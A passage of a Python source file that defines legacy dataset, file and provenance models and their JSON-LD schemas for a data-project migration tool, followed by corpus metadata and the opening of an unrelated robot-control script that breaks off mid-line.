field.\"\"\"\n return generate_dataset_tag_id(name=self.name, commit=self.commit)\n\n def __attrs_post_init__(self):\n \"\"\"Post-Init hook.\"\"\"\n if not self._id or self._id.startswith(\"_:\"):\n self._id = self.default_id()\n\n @classmethod\n def from_jsonld(cls, data):\n \"\"\"Create 
an instance from JSON-LD data.\"\"\"\n if isinstance(data, cls):\n return data\n if not isinstance(data, dict):\n raise ValueError(data)\n\n return OldDatasetTagSchema().load(data)\n\n def as_jsonld(self):\n \"\"\"Create JSON-LD.\"\"\"\n return OldDatasetTagSchema().dump(self)\n\n\n@attr.s(slots=True)\nclass Language:\n \"\"\"Represent a language of an object.\"\"\"\n\n alternate_name = attr.ib(default=None, kw_only=True)\n name = attr.ib(default=None, kw_only=True)\n\n @classmethod\n def from_jsonld(cls, data):\n \"\"\"Create an instance from JSON-LD data.\"\"\"\n if isinstance(data, cls):\n return data\n if not isinstance(data, dict):\n raise ValueError(data)\n\n return OldLanguageSchema().load(data)\n\n\ndef convert_filename_path(p):\n \"\"\"Return name of the file.\"\"\"\n if p:\n return Path(p).name\n\n\ndef convert_based_on(v):\n \"\"\"Convert based_on to DatasetFile.\"\"\"\n if v:\n return DatasetFile.from_jsonld(v)\n\n\n@attr.s(slots=True)\nclass DatasetFile(Entity):\n \"\"\"Represent a file in a dataset.\"\"\"\n\n added = attr.ib(converter=parse_date, kw_only=True)\n\n checksum = attr.ib(default=None, kw_only=True)\n\n filename = attr.ib(kw_only=True, converter=convert_filename_path)\n\n name = attr.ib(kw_only=True, default=None)\n\n filesize = attr.ib(default=None, kw_only=True)\n\n filetype = attr.ib(default=None, kw_only=True)\n\n url = attr.ib(default=None, kw_only=True)\n\n based_on = attr.ib(default=None, kw_only=True, converter=convert_based_on)\n\n external = attr.ib(default=False, kw_only=True)\n\n source = attr.ib(default=None, kw_only=True)\n\n @added.default\n def _now(self):\n \"\"\"Define default value for datetime fields.\"\"\"\n return datetime.datetime.now(datetime.timezone.utc)\n\n @filename.default\n def default_filename(self):\n \"\"\"Generate default filename based on path.\"\"\"\n if self.path:\n return Path(self.path).name\n\n def default_url(self):\n \"\"\"Generate default url based on project's ID.\"\"\"\n return generate_dataset_file_url(filepath=self.path)\n\n @property\n def commit_sha(self):\n \"\"\"Return commit hash.\"\"\"\n return self.commit.hexsha if self.commit else \"\"\n\n @property\n def full_path(self):\n \"\"\"Return full path in the current reference frame.\"\"\"\n path = project_context.path / self.path\n return Path(os.path.abspath(path))\n\n def __attrs_post_init__(self):\n \"\"\"Set the property \"name\" after initialization.\"\"\"\n super().__attrs_post_init__()\n\n if not self.filename:\n self.filename = self.default_filename()\n\n if not self.name:\n self.name = self.filename\n\n parsed_id = urlparse(self._id)\n\n if not parsed_id.scheme:\n self._id = f\"file://{self._id}\"\n\n if not self.url:\n self.url = self.default_url()\n\n def update_commit(self, commit):\n \"\"\"Set commit and update associated fields.\"\"\"\n self.commit = commit\n self._id = self.default_id()\n self._label = self.default_label()\n\n def update_metadata(self, path, commit):\n \"\"\"Update files metadata.\"\"\"\n self.path = str((project_context.path / path).relative_to(project_context.path))\n self.update_commit(commit)\n self.filename = self.default_filename()\n self.url = self.default_url()\n self.added = self._now()\n\n @classmethod\n def from_jsonld(cls, data):\n \"\"\"Create an instance from JSON-LD data.\"\"\"\n if isinstance(data, cls):\n return data\n if not isinstance(data, dict):\n raise ValueError(data)\n\n return OldDatasetFileSchema().load(data)\n\n def as_jsonld(self):\n \"\"\"Create JSON-LD.\"\"\"\n return 
OldDatasetFileSchema().dump(self)\n\n\ndef _convert_dataset_files(value):\n \"\"\"Convert dataset files.\"\"\"\n coll = value\n\n if isinstance(coll, dict): # compatibility with previous versions\n if any([key.startswith(\"@\") for key in coll.keys()]):\n return [DatasetFile.from_jsonld(coll)]\n else:\n coll = value.values()\n\n return [DatasetFile.from_jsonld(v) for v in coll]\n\n\ndef _convert_dataset_tags(value):\n \"\"\"Convert dataset tags.\"\"\"\n if isinstance(value, dict): # compatibility with previous versions\n value = [value]\n\n return [DatasetTag.from_jsonld(v) for v in value]\n\n\ndef _convert_language(obj):\n \"\"\"Convert language object.\"\"\"\n return Language.from_jsonld(obj) if isinstance(obj, dict) else obj\n\n\ndef _convert_keyword(keywords):\n \"\"\"Convert keywords collection.\"\"\"\n if isinstance(keywords, (list, tuple)):\n return keywords\n\n if isinstance(keywords, dict):\n return keywords.keys()\n\n\n@attr.s\nclass Dataset(Entity, CreatorMixin):\n \"\"\"Represent a dataset.\"\"\"\n\n _id = attr.ib(default=None, kw_only=True)\n _label = attr.ib(default=None, kw_only=True)\n\n date_published = attr.ib(default=None, kw_only=True)\n\n description = attr.ib(default=None, kw_only=True)\n\n identifier = attr.ib(default=attr.Factory(uuid.uuid4), kw_only=True, converter=_extract_doi)\n\n in_language = attr.ib(default=None, converter=_convert_language, kw_only=True)\n\n images = attr.ib(default=None, kw_only=True)\n\n keywords = attr.ib(converter=_convert_keyword, kw_only=True, default=None)\n\n license = attr.ib(default=None, kw_only=True)\n\n title = attr.ib(default=None, type=str, kw_only=True)\n\n url = attr.ib(default=None, kw_only=True)\n\n version = attr.ib(default=None, kw_only=True)\n\n date_created = attr.ib(converter=parse_date, kw_only=True)\n\n files = attr.ib(factory=list, converter=_convert_dataset_files, kw_only=True)\n\n tags = attr.ib(factory=list, converter=_convert_dataset_tags, kw_only=True)\n\n same_as = attr.ib(default=None, kw_only=True)\n\n name = attr.ib(default=None, kw_only=True)\n\n derived_from = attr.ib(default=None, kw_only=True)\n\n immutable = attr.ib(default=False, kw_only=True)\n\n _modified = attr.ib(default=False, init=False)\n\n _mutated = attr.ib(default=False, init=False)\n\n _metadata_path = attr.ib(default=None, init=False)\n\n @date_created.default\n def _now(self):\n \"\"\"Define default value for datetime fields.\"\"\"\n return datetime.datetime.now(datetime.timezone.utc)\n\n @property\n def short_id(self):\n \"\"\"Shorter version of identifier.\"\"\"\n if is_doi(self.identifier):\n return self.identifier\n return str(self.identifier)[:8]\n\n @property\n def creators_csv(self):\n \"\"\"Comma-separated list of creators associated with dataset.\"\"\"\n return \", \".join(creator.name for creator in self.creators)\n\n @property\n def keywords_csv(self):\n \"\"\"Comma-separated list of keywords associated with dataset.\"\"\"\n return \", \".join(self.keywords or [])\n\n @property\n def tags_csv(self):\n \"\"\"Comma-separated list of tags associated with dataset.\"\"\"\n return \",\".join(tag.name for tag in self.tags)\n\n @property\n def initial_identifier(self):\n \"\"\"Return the first identifier of the dataset.\"\"\"\n if self.path:\n return Path(self.path).name\n\n def contains_any(self, files):\n \"\"\"Check if files are already within a dataset.\"\"\"\n for file_ in files:\n if self.find_file(file_[\"path\"]):\n return True\n return False\n\n def find_files(self, paths):\n \"\"\"Return all paths that are in files 
container.\"\"\"\n files_paths = {str(project_context.path / f.path) for f in self.files}\n return {p for p in paths if str(p) in files_paths}\n\n def find_file(self, path, return_index=False):\n \"\"\"Find a file in files container using its relative path.\"\"\"\n for index, file in enumerate(self.files):\n if str(file.path) == str(path):\n if return_index:\n return index\n return file\n\n def update_metadata(self, **kwargs):\n \"\"\"Updates instance attributes.\"\"\"\n for attribute, value in kwargs.items():\n if value and value != getattr(self, attribute):\n self._modified = True\n setattr(self, attribute, value)\n\n return self\n\n def update_files(self, files):\n \"\"\"Update files with collection of DatasetFile objects.\"\"\"\n if isinstance(files, DatasetFile):\n files = (files,)\n\n new_files = []\n\n for new_file in files:\n old_file = self.find_file(new_file.path)\n if not old_file:\n new_files.append(new_file)\n elif new_file.commit != old_file.commit or new_file.added != old_file.added:\n self.unlink_file(new_file.path)\n new_files.append(new_file)\n\n if not new_files:\n return\n\n self._modified = True\n self.files += new_files\n\n def unlink_file(self, path, missing_ok=False): # FIXME: Remove unused code\n \"\"\"Unlink a file from dataset.\n\n Args:\n path: Relative path used as key inside files container.\n missing_ok (bool): Whether to ignore missing files or raise an error (Default value = False).\n \"\"\"\n index = self.find_file(path, return_index=True)\n if index is not None:\n self._modified = True\n return self.files.pop(index)\n\n if not missing_ok:\n raise errors.InvalidFileOperation(f\"File cannot be found: {path}\")\n\n def mutate(self):\n \"\"\"Update mutation history and assign a new identifier.\n\n Do not mutate more than once before committing the metadata or otherwise there would be missing links in the\n chain of changes.\n \"\"\"\n if self.immutable:\n raise errors.OperationError(f\"Cannot mutate an immutable dataset: {self.name}\")\n\n # As a safetynet, we only allow one mutation during lifetime of a dataset object; this is not 100% error-proof\n # because one can create a new object from a mutated but uncommitted metadata file.\n if self._mutated:\n return\n self._mutated = True\n\n self.same_as = None\n self.derived_from = Url(url_id=self._id)\n\n repository = project_context.repository\n mutator = Person.from_repository(repository)\n if not any(c for c in self.creators if c.email == mutator.email):\n self.creators.append(mutator)\n\n self.date_created = self._now()\n self.date_published = None\n\n self._replace_identifier(new_identifier=str(uuid.uuid4()))\n\n def _replace_identifier(self, new_identifier):\n \"\"\"Replace identifier and update all related fields.\"\"\"\n self.identifier = new_identifier\n self._set_id()\n self.url = self._id\n self._label = self.identifier\n\n def _set_id(self):\n self._id = generate_dataset_id(identifier=self.identifier)\n\n def __attrs_post_init__(self):\n \"\"\"Post-Init hook.\"\"\"\n super().__attrs_post_init__()\n\n self._set_id()\n self.url = self._id\n self._label = self.identifier\n\n if self.derived_from:\n host = get_host()\n derived_from_id = self.derived_from._id\n derived_from_url = self.derived_from.url.get(\"@id\")\n u = urlparse(derived_from_url)\n derived_from_url = u._replace(netloc=host).geturl()\n self.derived_from = Url(id=derived_from_id, url_id=derived_from_url)\n\n # if `date_published` is set, we are probably dealing with\n # an imported dataset so `date_created` is not needed\n if 
self.date_published:\n self.date_created = None\n\n if not self.path:\n absolute_path = LinkReference(\n metadata_path=project_context.metadata_path, name=f\"datasets/{self.name}\"\n ).reference.parent\n self.path = str(absolute_path.relative_to(project_context.path))\n\n if project_context.has_context():\n try:\n revision = self.commit.hexsha if self.commit else \"HEAD\"\n repository = project_context.repository\n self.commit = repository.get_previous_commit(os.path.join(self.path, \"metadata.yml\"), revision=revision)\n except errors.GitCommitNotFoundError:\n pass\n\n if not self.name:\n self.name = generate_default_name(self.title, self.version)\n\n @classmethod\n def from_yaml(cls, path, commit=None):\n \"\"\"Return an instance from a YAML file.\"\"\"\n data = yaml.read_yaml(path)\n\n self = cls.from_jsonld(data=data, commit=commit)\n self._metadata_path = path\n\n return self\n\n @classmethod\n def from_jsonld(cls, data, commit=None, schema_class=None):\n \"\"\"Create an instance from JSON-LD data.\"\"\"\n if isinstance(data, cls):\n return data\n if not isinstance(data, (dict, list)):\n raise ValueError(data)\n\n schema_class = schema_class or OldDatasetSchema\n return schema_class(commit=commit, flattened=True).load(data)\n\n def to_yaml(self, path=None, immutable=False):\n \"\"\"Write an instance to the referenced YAML file.\"\"\"\n if self._modified and not (immutable or self.immutable):\n self.mutate()\n\n self._metadata_path = path or self._metadata_path\n data = OldDatasetSchema(flattened=True).dump(self)\n yaml.write_yaml(path=self._metadata_path, data=data)\n\n def as_jsonld(self):\n \"\"\"Create JSON-LD.\"\"\"\n return OldDatasetSchema(flattened=True).dump(self)\n\n\nclass ImageObject:\n \"\"\"Represents a schema.org `ImageObject`.\"\"\"\n\n def __init__(self, content_url: str, position: int, id=None):\n self.content_url = content_url\n self.position = position\n self.id = id\n\n @staticmethod\n def generate_id(dataset: Dataset, position: int) -> str:\n \"\"\"Generate @id field.\"\"\"\n return urljoin(dataset._id + \"/\", posixpath.join(\"images\", str(position)))\n\n @property\n def is_absolute(self):\n \"\"\"Whether content_url is an absolute or relative url.\"\"\"\n return bool(urlparse(self.content_url).netloc)\n\n\nclass OldPersonSchema(JsonLDSchema):\n \"\"\"Person schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = [prov.Person, schema.Person]\n model = Person\n unknown = EXCLUDE\n\n affiliation = StringList(schema.affiliation, load_default=None)\n alternate_name = StringList(schema.alternateName, load_default=None)\n email = fields.String(schema.email, load_default=None)\n id = fields.Id()\n label = StringList(rdfs.label, load_default=None)\n name = StringList(schema.name, load_default=None)\n\n\nclass ProjectSchema(JsonLDSchema):\n \"\"\"Project Schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = [schema.Project, prov.Location]\n model = Project\n unknown = EXCLUDE\n\n name = fields.String(schema.name, load_default=None)\n created = DateTimeList(schema.dateCreated, load_default=None, format=\"iso\", extra_formats=(\"%Y-%m-%d\",))\n version = StringList(schema.schemaVersion, load_default=\"1\")\n agent_version = StringList(schema.agent, load_default=\"pre-0.11.0\")\n template_source = fields.String(renku.templateSource, load_default=None)\n template_ref = fields.String(renku.templateReference, load_default=None)\n template_id = fields.String(renku.templateId, load_default=None)\n template_version = 
fields.String(renku.templateVersion, load_default=None)\n template_metadata = fields.String(renku.templateMetadata, load_default=None)\n immutable_template_files = fields.List(renku.immutableTemplateFiles, fields.String(), load_default=[])\n automated_update = fields.Boolean(renku.automatedTemplateUpdate, load_default=True)\n creator = Nested(schema.creator, OldPersonSchema, load_default=None)\n _id = fields.Id(init_name=\"id\", load_default=None)\n\n @pre_dump\n def fix_datetimes(self, obj, many=False, **kwargs):\n \"\"\"Pre dump hook.\"\"\"\n if many:\n return [self.fix_datetimes(o, many=False, **kwargs) for o in obj]\n obj.created = fix_datetime(obj.created)\n return obj\n\n\nclass OldCommitMixinSchema(JsonLDSchema):\n \"\"\"CommitMixin schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n model = CommitMixin\n\n path = fields.String(prov.atLocation)\n _id = fields.Id(init_name=\"id\")\n _label = fields.String(rdfs.label, init_name=\"label\", load_default=None)\n _project = Nested(\n schema.isPartOf, [ProjectSchema, \"V9ProjectSchema\", V10ProjectSchema], init_name=\"project\", load_default=None\n )\n\n\nclass OldEntitySchema(OldCommitMixinSchema):\n \"\"\"Entity Schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = [prov.Entity, wfprov.Artifact]\n model = Entity\n\n checksum = fields.String(renku.checksum, load_default=None)\n\n\nclass OldCollectionSchema(OldEntitySchema):\n \"\"\"Collection Schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = [prov.Collection]\n model = Collection\n\n members = Nested(prov.hadMember, [OldEntitySchema, \"OldCollectionSchema\"], many=True)\n\n\nclass OldSoftwareAgentSchema(JsonLDSchema):\n \"\"\"SoftwareAgent schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = [prov.SoftwareAgent, wfprov.WorkflowEngine]\n model = SoftwareAgent\n unknown = EXCLUDE\n\n label = fields.String(rdfs.label)\n id = fields.Id()\n\n\nclass OldCreatorMixinSchema(JsonLDSchema):\n \"\"\"CreatorMixin schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n unknown = EXCLUDE\n\n creators = Nested(schema.creator, OldPersonSchema, many=True)\n\n\nclass OldUrlSchema(JsonLDSchema):\n \"\"\"Url schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = schema.URL\n model = Url\n unknown = EXCLUDE\n\n url = Uri(schema.url, load_default=None)\n _id = fields.Id(init_name=\"id\", load_default=None)\n\n\nclass OldDatasetTagSchema(JsonLDSchema):\n \"\"\"DatasetTag schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = schema.PublicationEvent\n model = DatasetTag\n unknown = EXCLUDE\n\n name = fields.String(schema.name)\n description = fields.String(schema.description, load_default=None)\n commit = fields.String(schema.location)\n created = fields.DateTime(schema.startDate, load_default=None, format=\"iso\", extra_formats=(\"%Y-%m-%d\",))\n dataset = fields.String(schema.about)\n _id = fields.Id(init_name=\"id\")\n\n @pre_dump\n def fix_datetimes(self, obj, many=False, **kwargs):\n \"\"\"Pre dump hook.\"\"\"\n if many:\n return [self.fix_datetimes(o, many=False, **kwargs) for o in obj]\n object.__setattr__(obj, \"created\", fix_datetime(obj.created))\n return obj\n\n\nclass OldLanguageSchema(JsonLDSchema):\n \"\"\"Language schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = schema.Language\n model = Language\n unknown = EXCLUDE\n\n alternate_name = fields.String(schema.alternateName)\n name = fields.String(schema.name)\n\n\nclass OldDatasetFileSchema(OldEntitySchema):\n \"\"\"DatasetFile 
schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = schema.DigitalDocument\n model = DatasetFile\n unknown = EXCLUDE\n\n added = DateTimeList(schema.dateCreated, format=\"iso\", extra_formats=(\"%Y-%m-%d\",))\n name = fields.String(schema.name, load_default=None)\n url = fields.String(schema.url, load_default=None)\n based_on = Nested(schema.isBasedOn, \"OldDatasetFileSchema\", load_default=None)\n external = fields.Boolean(renku.external, load_default=False)\n source = fields.String(renku.source, load_default=None)\n\n @pre_dump\n def fix_datetimes(self, obj, many=False, **kwargs):\n \"\"\"Pre dump hook.\"\"\"\n if many:\n return [self.fix_datetimes(o, many=False, **kwargs) for o in obj]\n obj.added = fix_datetime(obj.added)\n return obj\n\n\nclass OldImageObjectSchema(JsonLDSchema):\n \"\"\"ImageObject schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = schema.ImageObject\n model = ImageObject\n unknown = EXCLUDE\n\n id = fields.Id(load_default=None)\n content_url = fields.String(schema.contentUrl)\n position = fields.Integer(schema.position)\n\n\nclass OldDatasetSchema(OldEntitySchema, OldCreatorMixinSchema):\n \"\"\"Dataset schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = schema.Dataset\n model = Dataset\n unknown = EXCLUDE\n\n _id = fields.Id(init_name=\"id\", load_default=None)\n _label = fields.String(rdfs.label, init_name=\"label\", load_default=None)\n date_published = fields.DateTime(\n schema.datePublished,\n load_default=None,\n allow_none=True,\n format=\"%Y-%m-%d\",\n extra_formats=(\"iso\", \"%Y-%m-%dT%H:%M:%S\"),\n )\n description = fields.String(schema.description, load_default=None)\n identifier = fields.String(schema.identifier)\n in_language = Nested(schema.inLanguage, OldLanguageSchema, load_default=None)\n images = fields.Nested(schema.image, OldImageObjectSchema, many=True, load_default=None, allow_none=True)\n keywords = fields.List(schema.keywords, fields.String(), allow_none=True, load_default=None)\n license = Uri(schema.license, allow_none=True, load_default=None)\n title = fields.String(schema.name)\n url = fields.String(schema.url, load_default=None)\n version = fields.String(schema.version, load_default=None)\n date_created = fields.DateTime(\n schema.dateCreated, load_default=None, allow_none=True, format=\"iso\", extra_formats=(\"%Y-%m-%d\",)\n )\n files = Nested(schema.hasPart, OldDatasetFileSchema, many=True)\n tags = Nested(schema.subjectOf, OldDatasetTagSchema, many=True)\n same_as = Nested(schema.sameAs, OldUrlSchema, load_default=None)\n name = fields.String(schema.alternateName)\n derived_from = Nested(prov.wasDerivedFrom, OldUrlSchema, load_default=None)\n\n @pre_dump\n def fix_datetimes(self, obj, many=False, **kwargs):\n \"\"\"Pre dump hook.\"\"\"\n if many:\n return [self.fix_datetimes(o, many=False, **kwargs) for o in obj]\n obj.date_published = fix_datetime(obj.date_published)\n obj.date_created = fix_datetime(obj.date_created)\n return obj\n\n\ndef get_project_datasets():\n \"\"\"Return Dataset migration models for a project.\"\"\"\n paths = get_datasets_path().rglob(OLD_METADATA_PATH)\n return [Dataset.from_yaml(path=path) for path in paths]\n\n\ndef generate_label(path, hexsha):\n \"\"\"Generate label field.\"\"\"\n return f\"{path}@{hexsha}\"\n\n\ndef generate_file_id(hexsha, path):\n \"\"\"Generate DatasetFile id field.\"\"\"\n # Determine the hostname for the resource URIs.\n # If RENKU_DOMAIN is set, it overrides the host from remote.\n # Default is localhost.\n host = 
\"localhost\"\n host = project_context.remote.host or host\n host = os.environ.get(\"RENKU_DOMAIN\") or host\n\n # TODO: Use plural name for entity id: /blob/ -> /blobs/\n # always set the id by the identifier\n return urljoin(f\"https://{host}\", posixpath.join(f\"/blob/{hexsha}/{quote(str(path))}\"))\n\n\nclass MappedIOStreamSchema(JsonLDSchema):\n \"\"\"MappedIOStream schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = [renku.IOStream]\n model = MappedIOStream\n unknown = EXCLUDE\n\n _id = fields.Id(init_name=\"id\")\n _label = fields.String(rdfs.label, init_name=\"label\")\n stream_type = fields.String(renku.streamType)\n\n\nclass CommandParameterSchema(JsonLDSchema):\n \"\"\"CommandParameter schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = [renku.CommandParameter] # , schema.PropertyValueSpecification]\n model = CommandParameter\n unknown = EXCLUDE\n\n _id = fields.Id(init_name=\"id\")\n _label = fields.String(rdfs.label, init_name=\"label\")\n default_value = fields.Raw(schema.defaultValue, load_default=None)\n description = fields.String(schema.description, load_default=None)\n name = fields.String(schema.name, load_default=None)\n position = fields.Integer(renku.position, load_default=None)\n prefix = fields.String(renku.prefix, load_default=None)\n\n\nclass CommandArgumentSchema(CommandParameterSchema):\n \"\"\"CommandArgument schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = [renku.CommandArgument]\n model = CommandArgument\n unknown = EXCLUDE\n\n value = fields.String(renku.value)\n\n\nclass CommandInputSchema(CommandParameterSchema):\n \"\"\"CommandArgument schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = [renku.CommandInput]\n model = CommandInput\n unknown = EXCLUDE\n\n consumes = Nested(renku.consumes, [OldEntitySchema, OldCollectionSchema])\n mapped_to = Nested(renku.mappedTo, MappedIOStreamSchema, load_default=None)\n\n\nclass CommandOutputSchema(CommandParameterSchema):\n \"\"\"CommandArgument schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = [renku.CommandOutput]\n model = CommandOutput\n unknown = EXCLUDE\n\n create_folder = fields.Boolean(renku.createFolder)\n produces = Nested(renku.produces, [OldEntitySchema, OldCollectionSchema])\n mapped_to = Nested(renku.mappedTo, MappedIOStreamSchema, load_default=None)\n\n\nclass RunParameterSchema(JsonLDSchema):\n \"\"\"RunParameter schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = [renku.RunParameter]\n model = RunParameter\n unknown = EXCLUDE\n\n _id = fields.Id(init_name=\"id\")\n _label = fields.String(rdfs.label, init_name=\"label\")\n name = fields.String(schema.name)\n value = fields.String(renku.value)\n type = fields.String(renku.type)\n\n\nclass RunSchema(OldCommitMixinSchema):\n \"\"\"Run schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = [renku.Run, prov.Plan, prov.Entity]\n model = Run\n unknown = EXCLUDE\n\n command = fields.String(renku.command, load_default=None)\n successcodes = fields.List(renku.successCodes, fields.Integer(), load_default=[0])\n subprocesses = Nested(renku.hasSubprocess, nested=\"OrderedSubprocessSchema\", load_default=None, many=True)\n arguments = Nested(renku.hasArguments, CommandArgumentSchema, many=True, load_default=None)\n inputs = Nested(renku.hasInputs, CommandInputSchema, many=True, load_default=None)\n outputs = Nested(renku.hasOutputs, CommandOutputSchema, many=True, load_default=None)\n run_parameters = Nested(renku.hasRunParameters, 
RunParameterSchema, many=True, load_default=None)\n name = fields.String(schema.name, load_default=None)\n description = fields.String(schema.description, load_default=None)\n keywords = fields.List(schema.keywords, fields.String(), load_default=None)\n\n\nclass OrderedSubprocessSchema(JsonLDSchema):\n \"\"\"OrderedSubprocess schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = [renku.OrderedSubprocess]\n model = OrderedSubprocess\n unknown = EXCLUDE\n\n _id = fields.Id(init_name=\"id\")\n index = fields.Integer(renku.index)\n process = Nested(renku.process, RunSchema)\n\n\nclass AssociationSchema(JsonLDSchema):\n \"\"\"Association schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = prov.Association\n model = Association\n unknown = EXCLUDE\n\n _id = fields.Id(init_name=\"id\")\n plan = Nested(prov.hadPlan, [RunSchema])\n agent = Nested(prov.agent, [OldSoftwareAgentSchema, OldPersonSchema])\n\n\nclass UsageSchema(JsonLDSchema):\n \"\"\"Usage schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = prov.Usage\n model = Usage\n unknown = EXCLUDE\n\n _id = fields.Id(init_name=\"id\")\n entity = Nested(prov.entity, [OldEntitySchema, OldCollectionSchema, OldDatasetSchema, OldDatasetFileSchema])\n role = fields.String(prov.hadRole, load_default=None)\n\n\nclass GenerationSchema(JsonLDSchema):\n \"\"\"Generation schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = prov.Generation\n model = Generation\n unknown = EXCLUDE\n\n _id = fields.Id(init_name=\"id\")\n entity = Nested(\n prov.qualifiedGeneration,\n [OldEntitySchema, OldCollectionSchema, OldDatasetSchema, OldDatasetFileSchema],\n reverse=True,\n )\n role = fields.String(prov.hadRole, load_default=None)\n\n\nclass ActivitySchema(OldCommitMixinSchema):\n \"\"\"Activity schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = prov.Activity\n model = Activity\n unknown = EXCLUDE\n\n _message = fields.String(rdfs.comment, init_name=\"message\", load_default=None)\n _was_informed_by = fields.List(prov.wasInformedBy, fields.IRI(), init_name=\"was_informed_by\")\n generated = Nested(prov.activity, GenerationSchema, reverse=True, many=True, load_default=None)\n invalidated = Nested(\n prov.wasInvalidatedBy, [OldEntitySchema, OldCollectionSchema], reverse=True, many=True, load_default=None\n )\n influenced = Nested(prov.influenced, OldCollectionSchema, many=True)\n started_at_time = fields.DateTime(prov.startedAtTime, format=\"iso\", add_value_types=True)\n ended_at_time = fields.DateTime(prov.endedAtTime, format=\"iso\", add_value_types=True)\n agents = Nested(prov.wasAssociatedWith, [OldPersonSchema, OldSoftwareAgentSchema], many=True)\n\n @pre_dump(pass_many=True)\n def removes_ms(self, objs, many, **kwargs):\n \"\"\"Remove milliseconds from datetimes.\n\n Note: since DateField uses `strftime` as format, which only supports timezone info without a colon\n e.g. 
`+0100` instead of `+01:00`, we have to deal with milliseconds manually instead of using a format string.\n \"\"\"\n\n def _replace_times(obj):\n obj.started_at_time = obj.started_at_time.replace(microsecond=0)\n obj.ended_at_time = obj.ended_at_time.replace(microsecond=0)\n\n if many:\n for obj in objs:\n _replace_times(obj)\n return objs\n\n _replace_times(objs)\n return objs\n\n\nclass ProcessRunSchema(ActivitySchema):\n \"\"\"ProcessRun schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = wfprov.ProcessRun\n model = ProcessRun\n unknown = EXCLUDE\n\n association = Nested(prov.qualifiedAssociation, AssociationSchema)\n annotations = Nested(oa.hasTarget, AnnotationSchema, reverse=True, many=True)\n qualified_usage = Nested(prov.qualifiedUsage, UsageSchema, many=True)\n run_parameter = Nested(renku.hasRunParameter, RunParameterSchema, many=True)\n\n\nclass WorkflowRunSchema(ProcessRunSchema):\n \"\"\"WorkflowRun schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = wfprov.WorkflowRun\n model = WorkflowRun\n unknown = EXCLUDE\n\n _processes = Nested(wfprov.wasPartOfWorkflowRun, ProcessRunSchema, reverse=True, many=True, init_name=\"processes\")\n\n\nclass V9ProjectSchema(JsonLDSchema):\n \"\"\"Project Schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = [schema.Project, prov.Location]\n model = new_schema.Project\n unknown = EXCLUDE\n\n agent_version = StringList(schema.agent, load_default=\"pre-0.11.0\")\n annotations = Nested(oa.hasTarget, AnnotationSchema, reverse=True, many=True)\n automated_update = fields.Boolean(renku.automatedTemplateUpdate, load_default=True)\n creator = Nested(schema.creator, PersonSchema, load_default=None)\n date_created = DateTimeList(schema.dateCreated, load_default=None, format=\"iso\", extra_formats=(\"%Y-%m-%d\",))\n description = fields.String(schema.description, load_default=None)\n id = fields.Id(load_default=None)\n immutable_template_files = fields.List(renku.immutableTemplateFiles, fields.String(), load_default=list())\n name = fields.String(schema.name, load_default=None)\n template_id = fields.String(renku.templateId, load_default=None)\n template_metadata = fields.String(renku.templateMetadata, load_default=None)\n template_ref = fields.String(renku.templateReference, load_default=None)\n template_source = fields.String(renku.templateSource, load_default=None)\n template_version = fields.String(renku.templateVersion, load_default=None)\n version = StringList(schema.schemaVersion, load_default=\"1\")\n keywords = fields.List(schema.keywords, fields.String(), load_default=None)\n","sub_path":"renku/core/migration/models/v9.py","file_name":"v9.py","file_ext":"py","file_size_in_byte":73959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"98389329","text":"from views import Terrain\nfrom models import Robot, Polygone, Wrapper\nfrom controllers import StrategiePolygone, StrategieAvancerDroitIRL, StrategieTournerIRL\nimport threading\nimport time\nimport sys\n\ntry:\n from robot2I013 import Robot2I013\nexcept: \n from models.RobotIRLInterface import RobotIRLInterface as Robot2I013\n\nstop_thread = True\n\ndef updateStrats(stratCarre, fps):\n stratCarre.start()\n while not stratCarre.stop():\n stratCarre.step()\n time.sleep(1./fps)\n global stop_thread\n stop_thread = False\n\ndef run(cote):\n wrapper = Wrapper.Wrapper(Robot2I013())\n startAvancer = StrategieAvancerDroitIRL.StrategieAvancerDroitIRL(wrapper, 70., 15.)\n startTourner = 
